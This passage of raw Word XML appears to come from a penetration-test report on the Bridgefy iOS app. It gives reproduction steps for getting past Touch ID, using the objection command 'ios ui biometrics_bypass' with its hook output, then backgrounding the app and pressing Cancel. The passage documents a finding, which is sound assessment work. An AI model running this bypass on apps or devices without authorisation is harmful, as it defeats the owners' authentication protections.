      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>objection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>objection -g BridgefyStaging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>explore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1440" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.om.bridgefy.BridgefyNewStaging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iPhone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[usb]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ui</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>biometrics_bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1440" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(agent)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Registering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>314141.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ios-biometrics-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>evaluatePolicy (agent) Registering job 363717. Type:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ios-biometrics-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>evaluateAccessControl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1440" w:right="377" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On the iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>it) or switch to another application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487601152">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186842</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="41" name="Graphic 41"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="41" name="Graphic 41"/>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4.711987pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15715328;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape31" coordorigin="1440,294" coordsize="2880,0" path="m1440,294l4320,294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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId82">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/localauthentication/lacontext</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="60"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId83">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/localauthentication/lacontext/1514176-evaluatepolicy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/sensepost/objection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://frida.re/docs/ios/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="135"/>
        <w:rPr>
